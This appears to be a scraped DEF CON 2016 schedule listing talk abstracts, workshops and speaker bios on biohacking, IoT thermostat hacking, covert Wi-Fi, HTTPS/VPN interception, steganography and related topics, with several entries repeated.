Keoni Gandall- 18 year old biohacker, frequents DIYbio forums under alias "Koeng". Worked at UCI for 4 years in directed evolution lab. Likes DNA, BSD, and freedom.
Abstract:
The ultimate form of information storage: DNA.
Dumb question: Can we store Bitcoin addresses in DNA?
Participate in several challenges demystifying the idea of storing Bitcoins inside of DNA. The first who discovers the solution to each challenge wins the satoshi stored in the actual DNA code.
Return to Index
BHV - Skyview 4 - Friday - 12:00-12:59
Speaker: Keoni Gandall
About Keoni:
Keoni Gandall- 18 year old biohacker, frequents DIYbio forums under alias "Koeng". Worked at UCI for 4 years in directed evolution lab. Likes DNA, BSD, and freedom.
Abstract:
The ultimate form of information storage: DNA.
Dumb question: Can we store Bitcoin addresses in DNA?
Participate in several challenges demystifying the idea of storing Bitcoins inside of DNA. The first who discovers the solution to each challenge wins the satoshi stored in the actual DNA code.
Return to Index
BHV - Skyview 4 - Saturday - 17:00-17:59
Speaker: Jun Axup
About Jun Axup:
Jun Axup is the Science Director at IndieBio. She has a PhD in chemical biology and worked in various startups in immuno-oncology, lab automation robotics, CRISPR, and precision medicine. Jun is passionate about using the intersection of biology, technology, and design to increasing human healthspan.
Abstract:
Biotech companies have historically been started by professors from prestigious institutions with millions of dollars of investment funding. Today, with the lowering cost of research and increasing amount of resources driven by Moore's law, robotics, software and efficiencies in bioproduction, anyone with an insight can start a biotech company for a fraction of the cost, be they PhD or biohacker.
At IndieBio, the world's largest biotech accelerator started just under 3 years ago, we've funded and help founders build 70 companies that redefine speed and innovation for biology. We have trained graduate students and first-time founders into entrepreneurs and have expanded biotechnology beyond therapeutics and medical devices. We see biology as the next big technology platform with applications in food, regenerative medicine, consumer products, neurotech, and bio-IT interfacing. Come hear about the big problems our companies are solving with biology as technology!
Return to Index
BHV - Skyview 4 - Saturday - 17:00-17:59
Speaker: Jun Axup
About Jun Axup:
Jun Axup is the Science Director at IndieBio. She has a PhD in chemical biology and worked in various startups in immuno-oncology, lab automation robotics, CRISPR, and precision medicine. Jun is passionate about using the intersection of biology, technology, and design to increasing human healthspan.
Abstract:
Biotech companies have historically been started by professors from prestigious institutions with millions of dollars of investment funding. Today, with the lowering cost of research and increasing amount of resources driven by Moore's law, robotics, software and efficiencies in bioproduction, anyone with an insight can start a biotech company for a fraction of the cost, be they PhD or biohacker.
At IndieBio, the world's largest biotech accelerator started just under 3 years ago, we've funded and help founders build 70 companies that redefine speed and innovation for biology. We have trained graduate students and first-time founders into entrepreneurs and have expanded biotechnology beyond therapeutics and medical devices. We see biology as the next big technology platform with applications in food, regenerative medicine, consumer products, neurotech, and bio-IT interfacing. Come hear about the big problems our companies are solving with biology as technology!
Return to Index
BHV - Skyview 4 - Saturday - 17:30-17:59
Speaker: Randall Alley
About Randall Alley:
Randall Alley is CEO and Chief Prosthetist for biodesigns inc., a Southern California prosthetic facility and R&D center specializing in upper and lower limb interface (socket) systems for patients for all ages and activity levels.
Our biomechanically focused, proprietary interface designs result in improved outcomes, greater patient acceptance and are backed by evidence-based clinical support. In conjunction with his practice, Alley has worked with DEKA Research and Development as their prosthetic interface design consultant for the Defense Advanced Research Projects Agency’s (DARPA) “Revolutionizing Prosthetics Project” chartered to develop the next generation of military upper limb prosthesis (a.k.a. the “Luke Arm”). Randy is currently the Principle Investigator on biodesigns’ own DARPA/SBIR Phase II contract.
Abstract:
Very often amputees, prosthetists, manufacturers and particularly the general public are all excited to hear about the latest developments in prosthetic components such as feet, ankles, knees and hands. And while these components have improved significantly over the last decade there is one area that has essentially been overlooked. And it’s an area that is arguably the most critical in terms of an individual’s comfort, control, proprioception, and overall health. I am of course talking about the prosthetic socket, or interface. The socket is universal to all upper & lower limb prosthetic systems and without it, prosthetic systems simply would not exist. Today nearly all prosthetic wearers are in sockets that provide limited biomechanical control and therefore outcomes are sub-par at best. Common wearer complaints include poor socket fit, inability for it to stay on or to be worn for long periods of time, excessive heat, skin irritations, poor performance among others.
This presentation will highlight the biomechanical differences of traditional sockets that merely encapsulate a residual limb to that of the High-Fidelity™ (HiFi) Interface that uses skeletal capture and control principles that result in increased comfort, increased performance, a trend toward gait symmetry, as well as improved range of motion, energy efficiency and overall user success. Perhaps the most interesting development resulting from osseostabilization is enhanced connectivity and proprioception. By mimicking the motions of the skeleton it is believed we are in effect “fooling” the brain into believing the lost arm or leg is back, a key component in the process of becoming whole again.
Return to Index
BHV - Skyview 4 - Saturday - 17:30-17:59
Speaker: Randall Alley
About Randall Alley:
Randall Alley is CEO and Chief Prosthetist for biodesigns inc., a Southern California prosthetic facility and R&D center specializing in upper and lower limb interface (socket) systems for patients for all ages and activity levels.
Our biomechanically focused, proprietary interface designs result in improved outcomes, greater patient acceptance and are backed by evidence-based clinical support. In conjunction with his practice, Alley has worked with DEKA Research and Development as their prosthetic interface design consultant for the Defense Advanced Research Projects Agency’s (DARPA) “Revolutionizing Prosthetics Project” chartered to develop the next generation of military upper limb prosthesis (a.k.a. the “Luke Arm”). Randy is currently the Principle Investigator on biodesigns’ own DARPA/SBIR Phase II contract.
Abstract:
Very often amputees, prosthetists, manufacturers and particularly the general public are all excited to hear about the latest developments in prosthetic components such as feet, ankles, knees and hands. And while these components have improved significantly over the last decade there is one area that has essentially been overlooked. And it’s an area that is arguably the most critical in terms of an individual’s comfort, control, proprioception, and overall health. I am of course talking about the prosthetic socket, or interface. The socket is universal to all upper & lower limb prosthetic systems and without it, prosthetic systems simply would not exist. Today nearly all prosthetic wearers are in sockets that provide limited biomechanical control and therefore outcomes are sub-par at best. Common wearer complaints include poor socket fit, inability for it to stay on or to be worn for long periods of time, excessive heat, skin irritations, poor performance among others.
This presentation will highlight the biomechanical differences of traditional sockets that merely encapsulate a residual limb to that of the High-Fidelity™ (HiFi) Interface that uses skeletal capture and control principles that result in increased comfort, increased performance, a trend toward gait symmetry, as well as improved range of motion, energy efficiency and overall user success. Perhaps the most interesting development resulting from osseostabilization is enhanced connectivity and proprioception. By mimicking the motions of the skeleton it is believed we are in effect “fooling” the brain into believing the lost arm or leg is back, a key component in the process of becoming whole again.
Return to Index
Wireless - Skyview 1 - Friday - 15:00-15:30
Rushikesh D. Nandedkar
Bio
Rushikesh: is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014 and BruCON 2015. Being an avid CTF player, for him solace is messing up with packets, frames and shell codes.
@nandedkarhrishi
Amrita C. Iyer
Bio
Amrita: is a test analyst by profession. Having spent a substantial time in the development life cycle of wide array of applications, it actually helped her earn a flair in the agile approaches addressing testing. A telecom engineer, who blended the network, security and testing in the perfect mold for her day to day work and passion. Her research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014 and BruCON 2015.
@amritaciyer
The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */
Abstract
In this talk we will be sharing an approach to ship data over broadcast
frames. We purposely opted for broadcast frames e.g. beacon frames, probe
requests etc., because of their obviously higher rate of availability with
no mandate of authentication and hence the lower possibility of suspicion
raised against their existence in the local radio periphery. For shipping
data in the fields other than the payload field, we considered certain
information elements such as SSID, DSset, TIM, Rates, ESRates,
initialization vector, Rates, FHset, CFset, TIM, IBSSset, challenge,
ERPinfo, QoS Capability, ERPinfo, RSNinfo, vendor, challenge text, extended
support rate, TPC report etc. We achieved nice results with probe request.
|
Return to Index
BHV - Skyview 4 - Saturday - 16:00-16:59
Speaker: Edward You
About Edward You:
Bio pending.
Abstract:
Big Data analytics is a rapidly growing field that promises to dramatically change the delivery of services in sectors as diverse as consumer products and healthcare. Big Data analytics also have the potential to enable deeper insight into complex scientific problems in the human condition by leveraging ever-increasing stores of knowledge coupled with ever-improving processing capabilities. These beneficial aspects of Big Data have been well-documented and widely touted. However, less attention has been paid to the possible risks associated with these technologies beyond issues related to privacy. In the hopes of sparking discussion and identifying paths forward to better safeguard the life, the FBI presentation will address some of the theoretical risks ranging from vulnerabilities of datasets to cyber intrusion and the potential malicious use of the integration and analysis of Big Data in the life sciences.
Return to Index
BHV - Skyview 4 - Sunday - 11:05-11:59
Speaker: Paul Ashley
About Paul Ashley:
Paul Ashley is Chief Technology Officer at Anonyome Labs, a startup company focused on identity obfuscation through building of fake identities. The company brings technology to every day users that allow them to interact online and offline in safety, privacy and control. Paul’s responsibilities at Anonyome Labs includes application architecture, development, emerging technologies, curating the patent portfolio, and technical partnerships.
Abstract:
In a world filled with danger emanating from all sorts of digital channels, having a proxy (or two) that you create, control, manage and direct is not just useful, but a requirement. Instead of worrying about an ineffectual government or an incomprehensible privacy policy, it’s possible that fake identities are a way to take ownership of the problem. Fake identities in the hands of the individual, are the way to swing the pendulum of privacy back to the people. The presentation will present our progress at building tools for people to implement fake identities to use offline and online. At the time of writing this abstract our users have 2 million active fake identities and the number is growing daily. These identities are used for dating, shopping, selling, social media, political statements and for numerous other uses.
Return to Index
BHV - Skyview 4 - Sunday - 11:05-11:59
Speaker: Paul Ashley
About Paul Ashley:
Paul Ashley is Chief Technology Officer at Anonyome Labs, a startup company focused on identity obfuscation through building of fake identities. The company brings technology to every day users that allow them to interact online and offline in safety, privacy and control. Paul’s responsibilities at Anonyome Labs includes application architecture, development, emerging technologies, curating the patent portfolio, and technical partnerships.
Abstract:
In a world filled with danger emanating from all sorts of digital channels, having a proxy (or two) that you create, control, manage and direct is not just useful, but a requirement. Instead of worrying about an ineffectual government or an incomprehensible privacy policy, it’s possible that fake identities are a way to take ownership of the problem. Fake identities in the hands of the individual, are the way to swing the pendulum of privacy back to the people. The presentation will present our progress at building tools for people to implement fake identities to use offline and online. At the time of writing this abstract our users have 2 million active fake identities and the number is growing daily. These identities are used for dating, shopping, selling, social media, political statements and for numerous other uses.
Return to Index
Workshops - Las Vegas Ballroom 5 - Thursday - 10:00-14:00
The in’s and out’s of Steganography
Chuck Easttom Computer Scientist
The class will start with an overview of basic steganography and a history. Now this part is probably common knowledge to many attendees. But then we will delve into specific tools including hiding data in wav files. We will also explore forensic techniques to detect steganography. Then we will look at cutting edge new steganography techniques. One of my 6 patents is for distributed steganography so that will be one of the new techniques we will explore. Finally, the training will culminate with reviewing actual source code that does steganography. Attendees will get the working source code to take with them. The idea is to start with basics that probably over 3/4 of attendees know and then move deeper into topics most people don’t know. That way everyone can benefit from the workshop, both novices and experts.
Chuck Easttom has been in the IT industry for over 25 years and training for over 15. He has 2 masters degrees and holds 40 industry certifications. He is the author of 20 computer science books and inventor with 7 patented inventions (including a steganography invention). He travels around the world teaching computer security and speaking on security related topics. He has conducted compute security training for, a wide range of law enforcement officers, various companies, and a variety of government agencies from around the world
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: If they bring a laptop they can do hands on.
Return to Index
BHV - Skyview 4 - Saturday - 12:00-12:59
Speakers: Rock Stevens and Candice Schumann
@ada95ftw
About Rock Stevens:
Rock Stevens began working in IT as an under-paid network administrator at the age of 15. He was selected as a 2015 Madison Policy Forum Military-Business Cybersecurity Fellow and is currently pursuing a master’s degree in Computer Science at the University of Maryland College Park.
About Candice Schumann:
Candice Schumann was born in Johannesburg, South Africa. She was a Computer Science and Mathematics dual major at La Salle University. Candice’s interests lie in Computational Biology and Machine Learning; she is currently pursuing a PhD degree in Computer Science with a focus in Computational Biology.
Abstract:
Want to put your hacking skills to good use? We’re talking about the ultimate good -- curing incurable diseases and improving the quality of life for billions of people. In our talk, we’ll discuss breakthroughs in computational biology and how easily you can help with the skills you already have.
Return to Index
BHV - Skyview 4 - Saturday - 16:30-16:59
Speaker: Victoria Sutton
@CyberLawProf
victoriasutton.org
About Victoria Sutton:
Dr. Sutton is an international authority on biodefense laws and regulations and has served as an expert to the United Nations. She is a lawyer and a scientist.
Abstract:
The next big thing in bioterrorism is likely to be biochemicals that change perceptions through altering neurological responses to environmental stimuli. What if you feel love for your enemy and can't fight them? But they can still attack you? Diagnostics and countermeasures will be our primary defense if these are used. Can international law even keep up with the creativity that is made possible with rapid changes in biotechnology? Will it be a DIY biohacker that comes up with a solution?
Return to Index
SkyTalks - Skyview 3 - Saturday - 17:00-17:59
Speaker: Karl Kasarda, Ian McCollum
Talk: The next John Moses Browning will use GitHub
The rise of the machines will include a new manufacturing technology and its rapidly approaching: economic, consumer-level 3D printing using metal.
We have seen the potential of polymer 3D printing and how it has revolutionized prototyping as well as gimmicky widgets. Metal printing will allow us to actually apply this promise to durable engineered products, and the results will change the world. Custom prosthetics, experimental vehicles, project-specific scientific tooling, durable medical devices tailored to the patient anything you can imagine.
Metal-based 3D printing also means that people will make guns. Polymer 3D printed firearms have captured wide attention but are short-lived. They are a wonderful opportunity for experimentation, but ultimately they are necessarily disposable, bulky, and limited to rather light cartridges. Home-printed metal firearms will provide an opportunity to have all the political implications of weapon from a MakerBot but with something that can actually function effectively and on par with todays industrial standards.
But guns are not toys, they are potentially dangerous handheld pressure vessels which we blithely expect to contain 50,000+ psi for milliseconds and then unlock and cycle in the blink of an eye. Those who are planning on experimenting with designing and fabricating them will need critical background knowledge.
In this presentation, Karl Kasarda (InRange TV) and Ian McCollum (Forgotten Weapons, InRange TV) will give you a background primer on how a wide variety of firearms work. Because we do not know what opportunities 3D metal printing will ultimately bring forth, this presentation will cover a vast multitude of different ways guns function. Both commonplace modern designs and exotic experiments from the golden age of firearms invention will be showcased
This will not be an engineering design course, it will be a primer so that you may begin your work on the shoulders of giants who came before, instead of on barren ground. A new Gutenberg Press is coming. While we dont yet know who the Martin Luther(s) of this next reformation will be, we do know that the traditional powers attempts at gun control will inevitably become more futile.
Return to Index
SkyTalks - Skyview 3 - Sunday - 10:00-10:59
Speaker: Brendan OConnor
Talk: The Other Way to Get a Hairy Hand; or, Contracts for Hackers
What do an excessively hairy hand, a car-eating loch, a mechanical bull, and a house of ill repute in northern Montana mean for the iTunes EULA that nobody reads?
Legalese is the go-to term to explain (or pretend to justify) overly-complex sentences that involve weirdly-specific phrases followed by names that dont always relate (hereinafter referred to as duck wrangling). While you might cringe at pages of boilerplate, the stories that gave rise to all those words are hilarious and terrifying in turns.
Come join us for a discussion of why contracts got screwed up, what the words actually mean (and what they dont), what you actually need to know (without being legal advice, insert your favorite disclaimer here), and how to push back against the lawyers said it has to be in there next time youre signing something.
Get another beer; youre going to want it to toast the memories of all the poor suckers who gave us the law (or their leg), such as it is.
Return to Index
BHV - Skyview 4 - Friday - 10:30-10:59
Speaker: Robin Farmanfarmaian
About Robin:
Robin Farmanfarmaian is a Professional Speaker, Author, Entrepreneur, and Angel Investor, specializing in companies with the potential to impact >100M patients. Currently Robin is an Investor and VP at Invicta Medical, a medical technology company focusing on sleep apnea; VP at Actavalon, curing cancer by repairing p53; and Strategic Relations at MindMaze, VR for stroke and brain injury rehab. Her best selling book, “The Patient as CEO”, can be found on Amazon.
Abstract:
Robin's expertise showcases the future of medical technology, and how the convergence of accelerating tech will enable patients to be the key decision maker, executor, driver and ultimately the one responsible on the healthcare team. Patient empowerment and engagement through technological advancements including wearable technology, sensors, point-of-care diagnostics, 3D Printing, Tissue Engineering, Power of the Crowd, data, networks, artificial intelligence and robotics. These are some of the accelerating technologies set to fundamentally change healthcare and allow the patient to be in control of their own health.
Return to Index
BHV - Skyview 4 - Friday - 10:30-10:59
Speaker: Robin Farmanfarmaian
About Robin:
Robin Farmanfarmaian is a Professional Speaker, Author, Entrepreneur, and Angel Investor, specializing in companies with the potential to impact >100M patients. Currently Robin is an Investor and VP at Invicta Medical, a medical technology company focusing on sleep apnea; VP at Actavalon, curing cancer by repairing p53; and Strategic Relations at MindMaze, VR for stroke and brain injury rehab. Her best selling book, “The Patient as CEO”, can be found on Amazon.
Abstract:
Robin's expertise showcases the future of medical technology, and how the convergence of accelerating tech will enable patients to be the key decision maker, executor, driver and ultimately the one responsible on the healthcare team. Patient empowerment and engagement through technological advancements including wearable technology, sensors, point-of-care diagnostics, 3D Printing, Tissue Engineering, Power of the Crowd, data, networks, artificial intelligence and robotics. These are some of the accelerating technologies set to fundamentally change healthcare and allow the patient to be in control of their own health.
Return to Index
DEFCON - Track Three - Friday - 15:00-15:59
The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering
Amro Abdelgawad Founder, Immuneye
As a matter of fact, it is all about time to reverse engineer the most complex piece of code. Code complicity techniques are usually used just to increase the time and effort needed for reverse engineering. The desired effect of code complicity can be magnified using mechanisms that decrease and narrow the allowed time frame for any reverse engineering attempt into few milliseconds. Such approach can be applied using a metamorphic engine that is aware of the time dimension.
Beyond metamorphic applications for AV evasion, in this talk, we will present a novel approach to resist and evade reverse engineering using a remote metamorphic engine that generates diversified morphed machine code of a very short expiration lifetime. Our approach is based on a client-server model using challenge-response communication protocol made of morphed machine code rather than data. We will show how any reverse engineering attempt on such model will be forced to execute or emulate the morphed code. Thus the code will always have an upper hand to detect, evade and attack the reverse engineering environment. Our approach is immune to static code analysis as the functionalities and the communication protocol used are dynamically diversified remotely and do not exist in packed executable files. On the other hand, clock synchronized morphed machine code driven by a remote metamorphic engine would trap dynamic RE attempts in the maze of metamorphism. One that is immune to code tampering and reversing by detecting the non-self.
We will present the fundamental difference between metamorphic and polymorphic techniques used to evade AV compared to the ones that can be used to resist RE. We will show how a remote diversified metamorphic self-modifying code with a very short expiration lifetime can detect, evade, and resist any code analysis, reverse engineering, machine learning and tampering attempts.
Amro Abdelgawad is a security researcher and the founder of Immuneye. He has more than 15 years experience in software security and reverse engineering. He has experienced both sides of software security in vulnerability researching, penetration testing, reverse engineering, exploit development and the defensive side as a chief security officer for software companies running wide infrastructures. Amro is currently working as a security researcher where his main interests are analyzing malware, vulnerability researching and developing artificial software immunity.
Return to Index
BHV - Skyview 4 - Saturday - 18:00-18:59
Speaker: Andrea Coravos
@andreacoravos
About Andrea Coravos:
Andrea Coravos is the co-founder of Elektra Labs, a digital health platform democratizing clinical trials by supporting remote, at-home research. Andrea is a software engineer focused on digital medicine and neurotechnologies, a digital rights advocate, and a writer for NeuroTechX.
Abstract:
In the past few years, software has started to “eat” healthcare in a new way. Historically, software was predominately a productivity enhancement for healthcare, but now software is emerging as a medical device. Many companies are releasing their own versions of digital medicines. Cognitive behavioral therapy (CBT) apps are coming to market that improve sleep well without pills or potions. Companies like Akili Interactive are building clinically-validated cognitive therapeutics, assessments, and diagnostics that look and feel like high-quality video games for pediatric ADHD. But how do we know any of these products work? Clinical trials and research are adapting to support the rise of digital medicine and more research is moving out of the lab and intro the home. We'll look at the new models that are supporting this trend, including a dive into Ethereum, a blockchain technology that can decentralize clinical trials, provide an economic incentive to join the trials, and endow participants with stronger rights and security for their data. We’ll share what the future could hold for at home research, digital medicine, and blockchains.
Return to Index
BHV - Skyview 4 - Saturday - 18:00-18:59
Speaker: Andrea Coravos
@andreacoravos
About Andrea Coravos:
Andrea Coravos is the co-founder of Elektra Labs, a digital health platform democratizing clinical trials by supporting remote, at-home research. Andrea is a software engineer focused on digital medicine and neurotechnologies, a digital rights advocate, and a writer for NeuroTechX.
Abstract:
In the past few years, software has started to “eat” healthcare in a new way. Historically, software was predominately a productivity enhancement for healthcare, but now software is emerging as a medical device. Many companies are releasing their own versions of digital medicines. Cognitive behavioral therapy (CBT) apps are coming to market that improve sleep well without pills or potions. Companies like Akili Interactive are building clinically-validated cognitive therapeutics, assessments, and diagnostics that look and feel like high-quality video games for pediatric ADHD. But how do we know any of these products work? Clinical trials and research are adapting to support the rise of digital medicine and more research is moving out of the lab and intro the home. We'll look at the new models that are supporting this trend, including a dive into Ethereum, a blockchain technology that can decentralize clinical trials, provide an economic incentive to join the trials, and endow participants with stronger rights and security for their data. We’ll share what the future could hold for at home research, digital medicine, and blockchains.
Return to Index
CPV - Bronze 2 - Saturday - 11:30-12:00
Talk Title:
The State of HTTPS: securing web traffic is not what it used to be
Speaker Name, Employer or position:
J0N J4RV1S
Abstract:
Do you truly love your users and wrap them in the warm, confidential arms of forward-secrecy ciphersuites? Or do you uncaringly shove their fragile, unencrypted data out into the cold, transparent tubes, shivering and naked as it wanders across a hostile Internet?
For too long the practice of serving non-sensitive websites over HTTPS has been viewed as unnecessary, costly, and a waste of cycles. Fortunately, the once-plausible criticisms have been challenged and are falling away. Choosing to implement HTTPS is now a matter of principle and it should be fully embraced as the default transfer method for all web traffic.
Bio:
J.J. is a resident of Utah and wants to help make the Internet a safer place for everyone. After speaking at Utah's 2015 SAINTCON on the importance of HTTPS he decided to extend his interest in secure communications beyond the Con and commit to advocating for widespread HTTPS adoption. He created SecureUtah.org to serve as an information resource as well as a public tracker of which prominent Utah websites implement HTTPS correctly. His goal is to work with and convince every website to switch entirely to HTTPS and to inspire advocates in other states to champion the cause in their communities.
Social media links if provided:
@SecureUtah
Return to Index
SkyTalks - Skyview 3 - Friday - 09:00-09:59
Speaker grecs
Talk: The Trials & Tribulations of an Infosec Pro in the Government Sector
Trying to be a security professional in the government sector can quite a frustrating experience. Between government organizations jockeying against one another and contractors trying to turn the biggest profit possible, you can be stuck in a tough position just trying to do the right thing. Come join grecs (and join in the rant if you want to) for a fun-filled session covering the top pitfalls of government information security, solutions for overcoming them, and strategies for changing the culture.
Return to Index
SE - Palace 2-5 - Friday - 17:00-17:55
David Kennedy
Dave loves Chris Hadnagy, alot… almost too much. He masks it behind a fake love of Bruce Hornsby, but secretly he runs a “I Hate Hornsby” club on the Internet. Similar to Fight Club, its first rule is to not speak about the IHH. Dave is also the owner and operator of TrustedSec, the creator of SET and an all around amazing guy who gives really good hugs (to those that want them, except for Chris).
Return to Index
IOT - Bronze 4 - Saturday - 17:00-18:30
Thermostat Ransomware and Workshop
Ken Munro, Pen Test Partners
An introductory presentation followed by a demonstration covering hardware hacking topics such as reverse engineering, firmware analysis, remote code execution, even abusing OTA updates. Attendees will come away with a practical understanding of reverse engineering and attacking these devices. We will also go through a PoC IoT ransomware attack specifically for thermostats.
Attendees will see a breakdown of the technology, with a demo showing precisely how thermostats can be compromised. Finally a workshop will give attendees a solid and in-depth understanding of the security profile of many IoT devices, using readily available home heating thermostats. After that we then run a workshop so that everyone can get to have a free reign to hack their own. Well provide a range of IoT thermostats and tools so itll be as accessible as possible to all who want to participate.
Typically, access to embedded functionality in thermostats is via their JTAG ports so we will provide a primer on those as well as giving attendees the devices and tools to enable them to fully access the device and create their own hardware attack. Specifically, we want people to come away with a practical, hands-on understanding of IoT reverse engineering and enhanced hardware hacking skills.
30 mins for the demo, and 60 mins for the workshop.
Ken has been working in IT security for over 15 years. He writes for various newspapers and industry magazines, and regularly advises the broader press and news broadcasters. He works at Pen Test Partners who specialize in helping organizations understand and quantify risk to their business. In an effort to get beyond the unhelpful FUD put about by many security vendors Ken speaks widely on computer security, the Internet of Things, and takes great pleasure in highlighting vulnerabilities.
@PenTestPartners
@TheKenMunroShow
Return to Index
SkyTalks - Skyview 3 - Saturday - 10:00-10:59
Speakers: Jen, Darren
Talk: To Beat the Toaster, We Must Become the Toaster: How to Show AI Whos Boss in the Robot Apocalypse
You no longer have to think about your menu or buying groceries. You no longer have to be concerned with driving and travel. Your house is your personal assistant and cities keep you comfortable. But what happens when you wake tomorrow to find your agents of convenience have become vectors of attack and the man behind the controls is no man at all? How do we prevent our toasters from dominating us, eliminating us, or turning us into batteries? You are now engaged in a battle for survival and fighting for the very existence of your species. Enter the world of biohacking and biotechnology where grinders, citizen scientists, and cutting edge researchers are working on the tools we need in order to survive the Rise of the Machines. In this talk we will show how to arm ourselves (perhaps even literally) for the coming battle against the machines. With fervent initiative, open minds, and the right tools and technology, we can and will rise above, or perhaps prevent, the revolt launched by our artificial progeny.
Return to Index
BHV - Skyview 4 - Friday - 16:00-16:59
Speaker: Jennifer Szkatulski and Darren Lawless
@razzies
About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 19 years and is currently a Security Intelligence Analyst.
Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response.
She currently specializes in energy sector and industrial control system security. Prior to her career in security, Jennifer
studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science,
has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a
robotics club for kids, is learning to play the ukulele, and watches far too much tv. Jennifer should probably get a life. She is an
avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.
About Darren Lawless:
Darren Lawless is a security analyst with 13+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for large security
services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays,
experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech
bad-assedness. Still a squire in the realm, he maintains the ability to ask real world questions like, "Why (why not) do this? What are the risks? Should we care?"
Abstract:
You no longer have to think about your menu or buying groceries. You no longer have to be concerned with driving and travel. Your house is your personal assistant and cities keep you comfortable. But what happens when you wake tomorrow to find your agents of convenience have become vectors of attack and the man behind the controls is no man at all? How do we prevent our toasters from dominating us, eliminating us, or turning us into batteries?
You are now engaged in a battle for survival and fighting for the very existence of your species. Enter the world of biohacking and biotechnology where grinders, citizen scientists, and cutting edge researchers are working on the tools we need in order to survive the Rise of the Machines. In this talk we will show how to arm ourselves (perhaps even literally) for the coming battle against the machines. With fervent initiative, open minds, and the right tools and technology, we can and will Rise above, or perhaps prevent, the revolt launched by our artificial progeny.
Return to Index
WOS - Skyview 6 - Saturday - 10:10-10:59
To Catch An APT: YARA
Jay DiMartino. Senior Cyber Threat Researcher at at Fidelis Cybersecurity
Go from hunted to hunter using your hands. It's time to reclaim your networks and start hunting for big game APT armed with the pattern matching Swiss knife called YARA. Learn how to author YARA rule signatures with techniques used by malware researchers to mercilessly hunt down the elusive adversary of advanced threat actors, and discover patterns in their code. We will review a real world case example using the components from PlugX APT malware to explain writing beginner to advanced YARA rules. Those who are already familiar with YARA can still come to improve their rule signature writing skills by learning how to catch different malware family variants, all the while keeping false positives to a minimum.
Jay DiMartino is a Senior Threat Researcher for Fidelis Cybersecurity. He enjoys being a malware defender and has been doing Malware Reverse Engineering for over 5 years, with several industry certifications.
Return to Index
BHV - Skyview 4 - Saturday - 10:05-10:59
Speaker: Tess Schrodinger
About Tess:
Tess is a security engineer and researcher with over twenty years of experience in security and counterintelligence. When not researching and speaking on Insider Threat, Quantum Computing, Security Awareness, and Cryptography, she participates in triathlons and protects the world from stampeding herds of devops unicorns.
Abstract:
What is cognitive memory? How can you “implant” a password into it? Is this truly secure? Curiosity around these questions prompted exploration of the research and concepts surrounding the idea of making the authentication process more secure by implanting passwords into an individual’s memory. The result? The idea is that you are not able to reveal your credentials under duress but you are still able to authenticate to a system. This talk will cover the stages of memory pertaining to encoding, storage and retrieval; the limitations of human memory; and the concept of serial interception sequence learning training. Current research and experimentation will be reviewed as well as the potential for forensic hypnosis to be used to “hack” this approach.
Return to Index
BHV - Skyview 4 - Saturday - 10:05-10:59
Speaker: Tess Schrodinger
About Tess:
Tess is a security engineer and researcher with over twenty years of experience in security and counterintelligence. When not researching and speaking on Insider Threat, Quantum Computing, Security Awareness, and Cryptography, she participates in triathlons and protects the world from stampeding herds of devops unicorns.
Abstract:
What is cognitive memory? How can you “implant” a password into it? Is this truly secure? Curiosity around these questions prompted exploration of the research and concepts surrounding the idea of making the authentication process more secure by implanting passwords into an individual’s memory. The result? The idea is that you are not able to reveal your credentials under duress but you are still able to authenticate to a system. This talk will cover the stages of memory pertaining to encoding, storage and retrieval; the limitations of human memory; and the concept of serial interception sequence learning training. Current research and experimentation will be reviewed as well as the potential for forensic hypnosis to be used to “hack” this approach.
Return to Index
DEFCON - DEF CON 101 - Sunday - 14:00-14:59
Toxic Proxies - Bypassing HTTPS and VPNs to Pwn Your Online Identity
Alex Chapman Principal Researcher, Context Information Security
Paul Stone Principal Researcher, Context Information Security
Rogue access points provide attackers with powerful capabilities, but in 2016 modern privacy protections such as HTTPS Everywhere, free TLS certificates and HSTS are de-facto standards. Surely our encrypted traffic is now safe on the local coffee shop network? If not, my VPN will definitely protect me... right? In this talk we'll reveal how recent improvements in online security and privacy can be undermined by decades old design flaws in obscure specifications. These design weakness can be exploited to intercept HTTPS URLs and proxy VPN tunneled traffic. We will demonstrate how a rogue access point or local network attacker can use these new techniques to bypass encryption, monitor your search history and take over your online accounts. No logos, no acronyms; this is not a theoretical crypto attack. We will show our techniques working on $30 hardware in under a minute. Online identity? Compromised. OAuth? Forget about it. Cloud file storage? Now we're talking.
Alex Chapman is a Principal Security Researcher at Context Information Security in the UK, where he performs vulnerability discovery, exploit development, bespoke protocol analysis and reverse engineering. He has been credited in security advisories for a number of major software products for vendors such as Citrix, Google, Mozilla and VMware, and has presented his research at security conferences around the world. He has spent the past several months making things (for a change), poking holes in old technologies, and pointing out security flaws which have no place in modern day software.
Twitter: @noxrnet
Paul Stone is a Principal Security Researcher at Context Information Security in the UK where he performs vulnerability research, reverse engineering, and tool development. He has a focus on browser security and has reported a number of vulnerabilities in the major web browsers including Chrome, Internet Explorer, Firefox, and Safari. He has spoken at a number of Black Hat conferences, presenting the well-received 'Pixel-Perfect Timing Attacks' and 'Next Generation Clickjacking' talks. Paul's recent obsession has been Bluetooth LE and has helped create the RaMBLE Android app for collecting and analyzing BLE data.
Twitter: @pdjstone
Return to Index
IOT - Bronze 1 - Saturday - 16:00-16:50
Tranewreck
Jeff Kitson, Trustwave SpiderLabs, Security Researcher
This talk covers the reverse engineering and exploration of the Trane ComfortLink thermostats. These devices are manufactured and produced by Trane, a popular heating and cooling company offering Zwave and WiFi enabled thermostats packaged with their appliances. This talk covers a previously unreleased vulnerability in the Trane ComfortLink thermostats that allows for remote manipulation and information extraction by an attacker. The devices are vulnerable by default and this talk addresses the physical dangers posed by this vulnerability to customers. The tools and methods used in finding this vulnerability are also discussed at-length in the presentation along with a video demonstration of the exploit in action.
